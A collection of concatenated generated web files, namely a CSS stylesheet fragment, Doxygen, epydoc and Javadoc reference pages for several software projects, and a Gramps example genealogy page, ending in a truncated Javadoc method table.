background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABkAAAAZCAYAAADE6YVjAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAVNJREFUeNq01jFLAzEYxvH2UBCxiIiDUhzcdXCyIk5ufgUXLR37JdxcXBxcuwmOOtml0EKpo04iWIpIQREVEVFLjf9AhoC9e3O5uxd+lMLdPU1yedO8UiqXdQWO122ghi4+8IwGqiiId+uRCHbxqsLrFHNRz5ACSnhTch1EPScQpnIH0w7TWcGiz5rouS45rtkMVnxCJrAQ4yUq+oT8YhAjZOAT8oWHGCE9nxC9H64cA15w4xOiW0HbfErVNhvUa8c3cecQcoZv3xA9z+fCNbe4SNq7jvEUMaUnuE/au7SjkHbSR1G637ULh73Kn+gn7cIBttELGckQh9Jo8iMOrSksYx2b2MKk8FuvUUcHl/9GbiWuooYu3pVf/eARLZQxbp8na2YR0659e+HLmM/geN+z98lSRv8hZu2QQkYh+kzKjZkvHdPahymH6DNp5Cucev0JMAAkKj0NEoYBJwAAAABJRU5ErkJggg==);
}
.header a.right {
left: auto;
right: 10px;
}
.content {
background: url( menu-arrow.png ) 25px 15px no-repeat transparent;
padding: 150px 50px 50px 50px;
}
.header.mm-fixed-top + .content {
background-position: 25px 55px;
}
html.mm-opened.mm-zoom-menu body {
background: #333;
}
html.mm-opened.mm-zoom-menu.mm-light body {
background: #f3f3f3;
}
html.mm-opened.mm-zoom-menu.mm-black body {
background: #000;
}
html.mm-opened.mm-zoom-menu.mm-white body {
background: #fff;
}
html.mm-opened.mm-zoom-menu .mm-page {
background-color: #fff;
}
.mm-menu li .fa {
margin: 0 20px 0 5px;
font-size: 16px;
width: 12px;
}
body.no-iconbar .mm-menu li .fa {
display: none !important;
}
body.no-buttonbars .mm-menu li.buttonbar-item {
display: none !important;
}
body.no-labels .mm-menu .mm-label,
body.no-labels .mm-menu .mm-collapsed,
.Collapsed {
display: none !important;
}
body.no-toggles .mm-menu li .mm-toggle {
display: none !important;
}
.mm-menu {
width: 120px !important;
}
div.container_previous {
padding-left: 12px;
padding-top: 84px;
}
div.container {
}
div.container fieldset {
display: flex;
flex-direction: column;
align-items: stretch;
border: none;
justify-content: space-around;
}
div.container fieldset div {
display: flex;
flex-direction: row;
align-content: stretch;
align-items: stretch;
padding-bottom: 5px;
padding-top: 5px;
margin-bottom: 5px;
border-top: solid 1px rgba(211, 211, 211, 0.5);
/* background-color: rgba(255, 255, 255, 0.56); */
/* height: 33px; */
}
div.container fieldset div label {
width: 15%;
margin-left: 3%;
}
div.container fieldset div label.largo {
width: 20%;
}
div.container fieldset div label.corto {
width: 11%;
}
div.container fieldset div input {
box-shadow: 5px 5px 23px -12px rgba(84, 84, 84, 0.5) inset;
color: #666;
font-size: 1em;
font-weight: normal;
border-radius: 5px;
box-sizing: border-box;
/*display: block;*/
font-weight: normal;
padding: 5px;
text-indent: 0;
text-transform: none;
vertical-align: middle;
}
div.container fieldset div select {
box-shadow: 5px 5px 23px -12px rgba(84, 84, 84, 0.5) inset;
color: #666;
font-size: 1em;
font-weight: normal;
border-radius: 5px;
box-sizing: border-box;
display: block;
padding: 5px;
text-indent: 0;
text-transform: none;
vertical-align: middle;
}
div.container table.table {
padding: 0;
margin: 0;
border-collapse: collapse;
width: 100%;
font-size: 13px;
border: solid 1px #ccc;
margin-top: 30px;
}
div.container table.table tr:nth-child(odd) {
background-color: #eee;
}
div.container table.table tr:nth-child(even) {
background-color: #fff;
}
div.container table.table tr td {
padding: 5px;
border-left: solid 1px #D9D9D9;
}
div.container table.table th {
background-color: rgba(55,179,73,1);
padding: 7px;
border: solid 1px #75D684;
color: #fff;
}
div.container table.table th a {
color: #fff;
font-weight: normal;
text-transform: uppercase;
}
span.disabled {
background-color: #ccc;
padding: 5px;
cursor: pointer;
}
input.btn {
background-color: #ddd;
padding: 5px;
border: 0;
cursor: pointer;
}
.ui-datepicker-trigger {
margin-left: 12px;
width: 22px;
height: 22px;
margin-top: 2px;
cursor: pointer;
}
label.largo {
width: 220px;
}
/*ESTADOS VERSIONES*/
a.borrador, a.publicado, a.caducado {
color: white;
padding: 5px;
border-radius: 4px;
margin: 4px;
}
a.borrador:hover, a.publicado:hover, a.caducado:hover {
opacity: 0.8;
}
a.borrador {
background-color: #777;
}
a.publicado {
background-color: rgba(55,179,73,1);
}
a.caducado {
background-color: #ff0000;
}
a.rechazo {
background-color:#ff9400;
}
a.revision {
background-color:#fff200;
}
|
doc/Doxygen/html/d2/dd3/GUIBoxData_8cpp.html
|
keinstein/mutabor
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>src/wxGUI/GUIBoxData.cpp-Dateireferenz</title>
<link href="../../doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Erzeugt von Doxygen 1.8.13 -->
<script type="text/javascript" src="../../menudata.js"></script>
<script type="text/javascript" src="../../menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('../../',false,false,'search.php','Suchen');
});
</script>
<div id="main-nav"></div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="../../dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li><li class="navelem"><a class="el" href="../../dir_eaae7e9da1b31c6b329e928d72e0e61a.html">wxGUI</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#namespaces">Namensbereiche</a> </div>
<div class="headertitle">
<div class="title">GUIBoxData.cpp-Dateireferenz</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include "<a class="el" href="../../d5/df7/GUIBoxData_8h_source.html">GUIBoxData.h</a>"</code><br />
<code>#include "<a class="el" href="../../d1/d65/Route_8h_source.html">src/kernel/routing/Route.h</a>"</code><br />
<code>#include "<a class="el" href="../../db/dc1/MutApp_8h_source.html">src/wxGUI/MutApp.h</a>"</code><br />
<code>#include "<a class="el" href="../../dd/db5/MutFrame_8h_source.html">src/wxGUI/MutFrame.h</a>"</code><br />
<code>#include "<a class="el" href="../../d6/d81/MutLogicWnd_8h_source.html">src/wxGUI/MutLogicWnd.h</a>"</code><br />
<code>#include "<a class="el" href="../../d4/dcc/NewBoxShape_8h_source.html">src/wxGUI/Routing/NewBoxShape.h</a>"</code><br />
<code>#include "wx/msgdlg.h"</code><br />
<code>#include "<a class="el" href="../../d5/d12/GUIBoxData-inlines_8h_source.html">GUIBoxData-inlines.h</a>"</code><br />
<code>#include "<a class="el" href="../../d2/d2c/Route-inlines_8h_source.html">src/kernel/routing/Route-inlines.h</a>"</code><br />
</div><div class="textblock"><div class="dynheader">
Include-Abhängigkeitsdiagramm für GUIBoxData.cpp:</div>
<div class="dyncontent">
<div class="center"><img src="../../d8/dd9/GUIBoxData_8cpp__incl.png" border="0" usemap="#src_2wxGUI_2GUIBoxData_8cpp" alt=""/></div>
<!-- MAP 0 -->
</div>
</div>
<p><a href="../../d2/dd3/GUIBoxData_8cpp_source.html">gehe zum Quellcode dieser Datei</a></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="namespaces"></a>
Namensbereiche</h2></td></tr>
<tr class="memitem:db/d94/namespacemutaborGUI"><td class="memItemLeft" align="right" valign="top">  </td><td class="memItemRight" valign="bottom"><a class="el" href="../../db/d94/namespacemutaborGUI.html">mutaborGUI</a></td></tr>
<tr class="memdesc:db/d94/namespacemutaborGUI"><td class="mdescLeft"> </td><td class="mdescRight">not for headers <br /></td></tr>
<tr class="separator:"><td class="memSeparator" colspan="2"> </td></tr>
</table>
</div><!-- contents -->
<hr size="1"><address style="align: right;"><small>
Erzeugt am Sam Sep 15 2018 14:57:54 für Mutabor von <a href="http://www.doxygen.org/index.html"><img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.8.13</small></address>
</body>
</html>
|
docs/doxygen/html/_generator_stab_form_8h.html
|
Thales1330/PSP
|
<!-- HTML header for doxygen 1.8.13-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.13"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Power System Platform: Project/GeneratorStabForm.h File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
extensions: ["tex2jax.js"],
jax: ["input/TeX","output/HTML-CSS"],
});
</script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="logoHeader.png"/></td>
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">Power System Platform
 <span id="projectnumber">2018w15a</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.13 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('',true,false,'search.php','Search');
$(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_ffd1f789ec7bd0a45fc6ad92579c5070.html">Project</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#nested-classes">Classes</a> </div>
<div class="headertitle">
<div class="title">GeneratorStabForm.h File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include "ElementFormBase.h"</code><br />
</div><div class="textblock"><div class="dynheader">
Include dependency graph for GeneratorStabForm.h:</div>
<div class="dyncontent">
<div class="center"><img src="_generator_stab_form_8h__incl.png" border="0" usemap="#_project_2_generator_stab_form_8h" alt=""/></div>
</div>
</div><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a>
Classes</h2></td></tr>
<tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class  </td><td class="memItemRight" valign="bottom"><a class="el" href="class_generator_stab_form.html">GeneratorStabForm</a></td></tr>
<tr class="memdesc:"><td class="mdescLeft"> </td><td class="mdescRight">Form to edit the synchronous generator data for electromechanical studies. <a href="class_generator_stab_form.html#details">More...</a><br /></td></tr>
<tr class="separator:"><td class="memSeparator" colspan="2"> </td></tr>
</table>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.13
</small></address>
</body>
</html>
|
doc/toc-MiGBox.gui-module.html
|
bertl4398/MiGBox
|
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>gui</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
<h1 class="toc">Module gui</h1>
<hr />
<h2 class="toc">Classes</h2>
<a target="mainFrame" href="MiGBox.gui.ui.AppUi-class.html"
>AppUi</a><br /> <h2 class="toc">Variables</h2>
<div class="private">
<a target="mainFrame" href="MiGBox.gui-module.html#__package__"
>__package__</a><br /> </div>
<hr />
<span class="options">[<a href="javascript:void(0);" class="privatelink"
onclick="toggle_private();">hide private</a>]</span>
<script type="text/javascript">
<!--
// Private objects are initially displayed (because if
// javascript is turned off then we want them to be
// visible); but by default, we want to hide them. So hide
// them unless we have a cookie that says to show them.
checkCookie();
// -->
</script>
</body>
</html>
|
gramps42/gramps/example_NAVWEB0/ppl/i/t/Q10KQC7X2FR3F83ETI.html
|
belissent/testing-example-reports
|
<!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Floyd, Robert William</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Floyd, Robert William<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Floyd, Robert William
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I0340</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate">1950-07-27</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Birth of Floyd, Robert William
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
LVG
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Custom FTW5 tag to specify LIVING not specified in GEDCOM 5.5
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="families">
<h4>Families</h4>
<table class="infolist">
<tr class="BeginFamily">
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"><a href="" title="Family of Floyd, Robert William and Данилов, Kathryn Louise">Family of Floyd, Robert William and Данилов, Kathryn Louise<span class="grampsid"> [F0058]</span></a></td>
</tr>
<tr class="BeginFamily">
<td class="ColumnType">Married</td>
<td class="ColumnAttribute">Wife</td>
<td class="ColumnValue">
<a href="../../../ppl/w/w/U5XJQCO3HY1XG4HSWW.html">Данилов, Kathryn Louise<span class="grampsid"> [I0167]</span></a>
</td>
</tr>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue">
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Marriage
</td>
<td class="ColumnDate">1977-01-08</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Marriage of Floyd, Robert William and Данилов, Kathryn Louise
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</td>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute">Children</td>
<td class="ColumnValue">
<ol>
<li>
<a href="../../../ppl/s/o/B20KQCRX6D76SH2OS.html">Floyd, Gregory Scott<span class="grampsid"> [I0341]</span></a>
</li>
<li>
<a href="../../../ppl/8/p/030KQCA8ZLPDRK6PP8.html">Floyd, Christopher Randall<span class="grampsid"> [I0342]</span></a>
</li>
<li>
<a href="../../../ppl/v/1/O30KQCD0N6D10XBV1V.html">Floyd, Joan Louise<span class="grampsid"> [I0343]</span></a>
</li>
</ol>
</td>
</tr>
</tr>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<ol>
<li class="thisperson">
Floyd, Robert William
<ol class="spouselist">
<li class="spouse">
<a href="../../../ppl/w/w/U5XJQCO3HY1XG4HSWW.html">Данилов, Kathryn Louise<span class="grampsid"> [I0167]</span></a>
<ol>
<li>
<a href="../../../ppl/s/o/B20KQCRX6D76SH2OS.html">Floyd, Gregory Scott<span class="grampsid"> [I0341]</span></a>
</li>
<li>
<a href="../../../ppl/8/p/030KQCA8ZLPDRK6PP8.html">Floyd, Christopher Randall<span class="grampsid"> [I0342]</span></a>
</li>
<li>
<a href="../../../ppl/v/1/O30KQCD0N6D10XBV1V.html">Floyd, Joan Louise<span class="grampsid"> [I0343]</span></a>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1">
Import from test2.ged
<span class="grampsid"> [S0003]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
weka/doc/weka/associations/tertius/SimpleLinkedList.html
|
chrissalij/Wiki-Reputation-Predictor
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_17) on Mon Jan 11 20:33:46 NZDT 2010 -->
<TITLE>
SimpleLinkedList
</TITLE>
<META NAME="date" CONTENT="2010-01-11">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="SimpleLinkedList";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../weka/associations/tertius/Rule.html" title="class in weka.associations.tertius"><B>PREV CLASS</B></A>
<A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListInverseIterator.html" title="class in weka.associations.tertius"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?weka/associations/tertius/SimpleLinkedList.html" target="_top"><B>FRAMES</B></A>
<A HREF="SimpleLinkedList.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: <A HREF="#nested_class_summary">NESTED</A> | FIELD | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
weka.associations.tertius</FONT>
<BR>
Class SimpleLinkedList</H2>
<PRE>
java.lang.Object
<IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>weka.associations.tertius.SimpleLinkedList</B>
</PRE>
<DL>
<DT><B>All Implemented Interfaces:</B> <DD>java.io.Serializable, <A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public class <B>SimpleLinkedList</B><DT>extends java.lang.Object<DT>implements java.io.Serializable, <A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A></DL>
</PRE>
<P>
<DL>
<DT><B>Version:</B></DT>
<DD>$Revision: 1.6 $</DD>
<DT><B>Author:</B></DT>
<DD>Peter A. Flach, Nicolas Lachiche</DD>
<DT><B>See Also:</B><DD><A HREF="../../../serialized-form.html#weka.associations.tertius.SimpleLinkedList">Serialized Form</A></DL>
<HR>
<P>
<!-- ======== NESTED CLASS SUMMARY ======== -->
<A NAME="nested_class_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Nested Class Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> class</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListInverseIterator.html" title="class in weka.associations.tertius">SimpleLinkedList.LinkedListInverseIterator</A></B></CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> class</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListIterator.html" title="class in weka.associations.tertius">SimpleLinkedList.LinkedListIterator</A></B></CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#SimpleLinkedList()">SimpleLinkedList</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#add(java.lang.Object)">add</A></B>(java.lang.Object o)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#addAll(weka.associations.tertius.SimpleLinkedList)">addAll</A></B>(<A HREF="../../../weka/associations/tertius/SimpleLinkedList.html" title="class in weka.associations.tertius">SimpleLinkedList</A> list)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#addFirst(java.lang.Object)">addFirst</A></B>(java.lang.Object o)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#clear()">clear</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.Object</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#getFirst()">getFirst</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.Object</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#getLast()">getLast</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#getRevision()">getRevision</A></B>()</CODE>
<BR>
Returns the revision string.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListInverseIterator.html" title="class in weka.associations.tertius">SimpleLinkedList.LinkedListInverseIterator</A></CODE></FONT></TD>
